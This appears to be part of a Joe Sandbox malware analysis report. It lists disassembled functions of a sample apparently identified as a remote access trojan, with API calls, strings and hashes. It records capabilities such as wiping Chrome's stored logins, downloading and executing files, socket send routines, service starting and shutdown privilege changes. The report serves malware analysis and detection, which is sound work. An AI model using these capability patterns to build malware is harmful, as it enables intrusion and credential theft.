                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 000D31ED
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D31F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                              • API String ID: 2127411465-314212984
                                              • Opcode ID: 552b9b5c95ec1acb192b3ea4694053c940f4073e668df5bfd3c38c7762ec671d
                                              • Instruction ID: 8b6820f793c3e844fe841bd45b087c6c94f756a46fe19d10327b9f777860cf74
                                              • Opcode Fuzzy Hash: 552b9b5c95ec1acb192b3ea4694053c940f4073e668df5bfd3c38c7762ec671d
                                              • Instruction Fuzzy Hash: 12B1B672A043006BC618F774CC97EFE76A95F96714F400A5EF846932D3EF659B0582A3
                                              Function 000CB21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 000CB257
                                              • GetLastError.KERNEL32 ref: 000CB261
                                              Strings
                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 000CB222
                                              • [Chrome StoredLogins found, cleared!], xrefs: 000CB287
                                              • [Chrome StoredLogins not found], xrefs: 000CB27B
                                              • UserProfile, xrefs: 000CB227
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                              • API String ID: 2018770650-1062637481
                                              • Opcode ID: 87f9688345691822408b81ddab6a89f43b23d76aca02a571097821d011e29d6e
                                              • Instruction ID: 68c31eca3cbd45b84089bffd0a5a00d0cade30bd34fb108bed89fe41a484a4eb
                                              • Opcode Fuzzy Hash: 87f9688345691822408b81ddab6a89f43b23d76aca02a571097821d011e29d6e
                                              • Instruction Fuzzy Hash: D1012D32A4410497CB4477B4ED6BEFE7738AF12710F40011DF402632D3FF615A558291
                                              Function 000D6AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 000D6AC4
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 000D6ACB
                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 000D6ADD
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 000D6AFC
                                              • GetLastError.KERNEL32 ref: 000D6B02
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeShutdownPrivilege
                                              • API String ID: 3534403312-3733053543
                                              • Opcode ID: a353a65cc900b71729c4d9d59696f207bd8a6f44974c8608f31d5d6c3a47b561
                                              • Instruction ID: b6e1a9904e36c9a1aa45097522a289c8470d8a3c081e10e08ecf40ed568927a9
                                              • Opcode Fuzzy Hash: a353a65cc900b71729c4d9d59696f207bd8a6f44974c8608f31d5d6c3a47b561
                                              • Instruction Fuzzy Hash: C3F0FE75805229BBDB109B91DD4DEEF7FBCEF05755F004050B806E2290D7745A44CBB1
                                              Function 000C89A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 000C89AE
                                                • Part of subcall function 000C41F1: socket.WS2_32(?,00000001,00000006), ref: 000C4212
                                                • Part of subcall function 000C428C: connect.WS2_32(?,?,?), ref: 000C42A5
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 000C8A8D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 000C8AE0
                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 000C8AF7
                                                • Part of subcall function 000C4468: WaitForSingleObject.KERNEL32(?,00000000,LL,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000), ref: 000C450E
                                                • Part of subcall function 000C4468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000,?,?,?,?,?,000D4CE9), ref: 000C453C
                                                • Part of subcall function 000C47EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C47FD
                                                • Part of subcall function 000C47EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4808
                                                • Part of subcall function 000C47EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4811
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000C8DA1
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                              • String ID:
                                              • API String ID: 4043647387-0
                                              • Opcode ID: 7793234c4540c886fa216cce72bf922efbe1d74f62b397d5cffca15084bdccc9
                                              • Instruction ID: 70ef6dec32a2533b2b2776c13c944399b3af762b622c0457357d297f91a84fda
                                              • Opcode Fuzzy Hash: 7793234c4540c886fa216cce72bf922efbe1d74f62b397d5cffca15084bdccc9
                                              • Instruction Fuzzy Hash: F9A13A329001189ACB18EBA0DC96FED7779AF55310F50826EF906A71D3EF345E498B54
                                              Function 000D9BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,000D981A,00000000,00000000), ref: 000D9BCD
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,000D981A,00000000,00000000), ref: 000D9BE2
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,000D981A,00000000,00000000), ref: 000D9BEF
                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,000D981A,00000000,00000000), ref: 000D9BFA
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,000D981A,00000000,00000000), ref: 000D9C0C
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,000D981A,00000000,00000000), ref: 000D9C0F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                              • String ID:
                                              • API String ID: 276877138-0
                                              • Opcode ID: 3eab08321d2923db705b4826b722b2ed736b2d6f7f85560789566b838743b73c
                                              • Instruction ID: 91c676cca3cb80f4b5aeaa5c39984dab08c89d52d3921a9e9e249b77434f7a13
                                              • Opcode Fuzzy Hash: 3eab08321d2923db705b4826b722b2ed736b2d6f7f85560789566b838743b73c
                                              • Instruction Fuzzy Hash: D2F0E9714043146FD2145B30AD88EFF2A7CDF8B360B00441AF44193381CF64CD85A5B1
                                              Function 004084F3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106encryptionmemorystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpA.KERNEL32(1.3.6.1.4.1.311.2.1.12,?,004E9598,0000001C), ref: 0040852B
                                              • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 00408553
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00408569
                                              • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 00408595
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CryptDecodeObject$AllocLocallstrcmp
                                              • String ID: 1.3.6.1.4.1.311.2.1.12
                                              • API String ID: 3284379815-2596186611
                                              • Opcode ID: 97ffdf57a553b8638c6a0d76eebed708acadcd14246dfc87692436479d3a763c
                                              • Instruction ID: c873b066cdd88eb137005279340a5094d2e94afccd150f66e497f36c002e7681
                                              • Opcode Fuzzy Hash: 97ffdf57a553b8638c6a0d76eebed708acadcd14246dfc87692436479d3a763c
                                              • Instruction Fuzzy Hash: CE416331900606EFCF208F95C94099ABBB4FF08310B15846EE995BB692DF75ED80CF58
                                              Function 000D58B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000D6AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 000D6AC4
                                                • Part of subcall function 000D6AB7: OpenProcessToken.ADVAPI32(00000000), ref: 000D6ACB
                                                • Part of subcall function 000D6AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 000D6ADD
                                                • Part of subcall function 000D6AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 000D6AFC
                                                • Part of subcall function 000D6AB7: GetLastError.KERNEL32 ref: 000D6B02
                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 000D595B
                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 000D5970
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D5977
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                              • String ID: PowrProf.dll$SetSuspendState
                                              • API String ID: 1589313981-1420736420
                                              • Opcode ID: 01984f15f91850ecb92b5d2c3b66f1131ed238c0169c44ae88b8195b01106fd7
                                              • Instruction ID: f11f7cb7fd1bd9a88d13340cf7e23e21fd5283f6ca9c7703d2bc122ae1fd9199
                                              • Opcode Fuzzy Hash: 01984f15f91850ecb92b5d2c3b66f1131ed238c0169c44ae88b8195b01106fd7
                                              • Instruction Fuzzy Hash: E121717160871196CF24F7B09CA6FFE626A9F82742F444C2EB503A72C3EF748D458661
                                              Function 001111E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00111502,?,00000000), ref: 0011127C
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00111502,?,00000000), ref: 001112A5
                                              • GetACP.KERNEL32(?,?,00111502,?,00000000), ref: 001112BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: ACP$OCP
                                              • API String ID: 2299586839-711371036
                                              • Opcode ID: fd8c9e3786da7167ee0f12532e4bd2f62890ad653d227e4c0914870ec32a9a77
                                              • Instruction ID: 910d20de5e23ee7b0162f01654e458df65529cd174b93c3300296a38d1d71e52
                                              • Opcode Fuzzy Hash: fd8c9e3786da7167ee0f12532e4bd2f62890ad653d227e4c0914870ec32a9a77
                                              • Instruction Fuzzy Hash: 61219026A04104B6DB2C8F94DA00AE7F3A7AB55B60B768934EF0AD7650F732DDC1C390
                                              Function 004086CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65encryptionmemorystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpA.KERNEL32(?,1.2.840.113549.1.9.6,004E95D8,0000001C), ref: 0040870A
                                              • CryptDecodeObject.CRYPT32(00010001,000001F4,?,?,00000000,00000000,?), ref: 0040873C
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040874A
                                              • CryptDecodeObject.CRYPT32(00010001,000001F4,?,?,00000000,00000000,?), ref: 00408776
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CryptDecodeObject$AllocLocallstrcmp
                                              • String ID: 1.2.840.113549.1.9.6
                                              • API String ID: 3284379815-2921522063
                                              • Opcode ID: 1c03ec7a59233b454a33b4503108e448d365118ad8ecf43816259d6b52f441a0
                                              • Instruction ID: a788b97eae109580f0cac5c22c45467d660d294b5013f0328b589f60dcf9ace9
                                              • Opcode Fuzzy Hash: 1c03ec7a59233b454a33b4503108e448d365118ad8ecf43816259d6b52f441a0
                                              • Instruction Fuzzy Hash: FA218C71A4020AEFDB11CF95CD41B99BBB4BF58304F20406AEA50BB2A5DBB5E940CB18
                                              Function 00408636 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57timestringencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpA.KERNEL32(1.2.840.113549.1.9.5,?), ref: 0040865E
                                              • CryptDecodeObject.CRYPT32(00010001,1.2.840.113549.1.9.5,?,00000008,00000000,?,00000008), ref: 0040869A
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004086AC
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 004086B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Time$File$CryptDecodeLocalObjectSystemlstrcmp
                                              • String ID: 1.2.840.113549.1.9.5
                                              • API String ID: 1508694121-925610549
                                              • Opcode ID: 86d0d2358ef50f1fe37fed75dc18d9d99c9f79cf8d992799e0c2c3ea88eaf1c7
                                              • Instruction ID: f212b015d127512b5763636b9bb1128a0e4d06747a3459900feecbf1282a5b97
                                              • Opcode Fuzzy Hash: 86d0d2358ef50f1fe37fed75dc18d9d99c9f79cf8d992799e0c2c3ea88eaf1c7
                                              • Instruction Fuzzy Hash: 52118E71900208EFCB00CF84C984AEEBBB8FF58340F10446AE946A7660DB71E985CB54
                                              Function 000DA63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 000DA650
                                              • LoadResource.KERNEL32(00000000,?,?,000CE183,00000000), ref: 000DA664
                                              • LockResource.KERNEL32(00000000,?,?,000CE183,00000000), ref: 000DA66B
                                              • SizeofResource.KERNEL32(00000000,?,?,000CE183,00000000), ref: 000DA67A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Resource$FindLoadLockSizeof
                                              • String ID: SETTINGS
                                              • API String ID: 3473537107-594951305
                                              • Opcode ID: 8777350f99206a5227d25504e77679ee1c9d4b89dac121655346d5da60ae20b2
                                              • Instruction ID: b51e8ccd42966c0d172b9e8b4e8e2254c0f5fdba0a00dd39b3a03546846d90a0
                                              • Opcode Fuzzy Hash: 8777350f99206a5227d25504e77679ee1c9d4b89dac121655346d5da60ae20b2
                                              • Instruction Fuzzy Hash: 5EE01A7A604310BBCB251BA1BD4CD877F79E7C6B623048026FD05827A0DB758890CA20
                                              Function 001113B7 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106F1E
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F2B
                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 001114C3
                                              • IsValidCodePage.KERNEL32(00000000), ref: 0011151E
                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0011152D
                                              • GetLocaleInfoW.KERNEL32(?,00001001,00103CEC,00000040,?,00103E0C,00000055,00000000,?,?,00000055,00000000), ref: 00111575
                                              • GetLocaleInfoW.KERNEL32(?,00001002,00103D6C,00000040), ref: 00111594
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                              • String ID:
                                              • API String ID: 745075371-0
                                              • Opcode ID: 5351d19594ae2bcf4429ed75b8230b97fdfcb7a91448fe5f7033e51e106faf18
                                              • Instruction ID: 02929ca606a81265c54b09411609fec9f15d45e88d267e1fb5c2f4de2c3adfb6
                                              • Opcode Fuzzy Hash: 5351d19594ae2bcf4429ed75b8230b97fdfcb7a91448fe5f7033e51e106faf18
                                              • Instruction Fuzzy Hash: 1B519371900219BBDF28DFA5DC41AFEB3B9BF18B00F054579FA15EB990E77099808B61
                                              Function 000C7A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 000C7A91
                                              • FindFirstFileW.KERNEL32(00000000,?,00125AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7B4A
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7B6E
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7C76
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstH_prologNext
                                              • String ID:
                                              • API String ID: 1157919129-0
                                              • Opcode ID: fd8887c757a7d28e91a3276f32a7bf2c003806323f044ec35bd992cc56716f33
                                              • Instruction ID: abf4214e9a4de81e838b3c8605eff83d7379da03e62e0a8cd9075c1b8de93cd7
                                              • Opcode Fuzzy Hash: fd8887c757a7d28e91a3276f32a7bf2c003806323f044ec35bd992cc56716f33
                                              • Instruction Fuzzy Hash: 7E518E32900209AACB14FBA4DD96FED7BB8AF55310F50415DF80AA3193EF349B49CB91
                                              Function 0010800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0011D478), ref: 00108079
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0013179C,000000FF,00000000,0000003F,00000000,?,?), ref: 001080F1
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,001317F0,000000FF,?,0000003F,00000000,?), ref: 0010811E
                                              • _free.LIBCMT ref: 00108067
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 00108233
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                              • String ID:
                                              • API String ID: 1286116820-0
                                              • Opcode ID: 4eb6bbebce76ea331f41522f999f477314f4b15e2a59c646295e93a9f7f90cb4
                                              • Instruction ID: 9607462203e7fbf922a8127c862265653857c1df77335ef0f3616e8669ec5ce9
                                              • Opcode Fuzzy Hash: 4eb6bbebce76ea331f41522f999f477314f4b15e2a59c646295e93a9f7f90cb4
                                              • Instruction Fuzzy Hash: 4651E771908209EFCB14EF64DC819AEB7B8EF54360F14456AF4D4A36D1EBB09E46CB50
                                              Function 000C6128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 000C6234
                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 000C6318
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DownloadExecuteFileShell
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe$open
                                              • API String ID: 2825088817-1997188799
                                              • Opcode ID: d6161a76a56e3a2a1d81b6c424b6d7c303e5dba6b4d4fea83c12e7fca4327de6
                                              • Instruction ID: 40dd14744781f6467aab516fe75c894177dd3d40c72901b126dd38023ef75dae
                                              • Opcode Fuzzy Hash: d6161a76a56e3a2a1d81b6c424b6d7c303e5dba6b4d4fea83c12e7fca4327de6
                                              • Instruction Fuzzy Hash: 5F617F31604340A7DB24FB74D996FFE77A69F92710F40491DB8429B2C3EF259A09C6A2
                                              Function 000DBB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 000DBC6C
                                                • Part of subcall function 000D26D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 000D26E1
                                                • Part of subcall function 000D26D2: RegSetValueExA.KERNEL32(?,00126748,00000000,?,00000000,00000000,001342F8,?,?,000CE5FB,00126748,5.3.0 Pro), ref: 000D2709
                                                • Part of subcall function 000D26D2: RegCloseKey.KERNEL32(?,?,?,000CE5FB,00126748,5.3.0 Pro), ref: 000D2714
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateInfoParametersSystemValue
                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                              • API String ID: 4127273184-3576401099
                                              • Opcode ID: 020ef7a2eb6039c9defcdfb25c22a0778aeb3533d82c5ab8d29f125101a6d8eb
                                              • Instruction ID: 500433bfc65f3eac77cdb6ed82df7375db834e2baf08aaa85bbc979154f58607
                                              • Opcode Fuzzy Hash: 020ef7a2eb6039c9defcdfb25c22a0778aeb3533d82c5ab8d29f125101a6d8eb
                                              • Instruction Fuzzy Hash: 6A11A832B8432073D51835395E9BFEE2912A756B60F92011EF6013A3D7EB969A7103E2
                                              Function 00110A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00103CF3,?,?,?,?,0010374A,?,00000004), ref: 00110B61
                                              • _wcschr.LIBVCRUNTIME ref: 00110BF1
                                              • _wcschr.LIBVCRUNTIME ref: 00110BFF
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00103CF3,00000000,00103E13), ref: 00110CA2
                                              Memory Dump Source
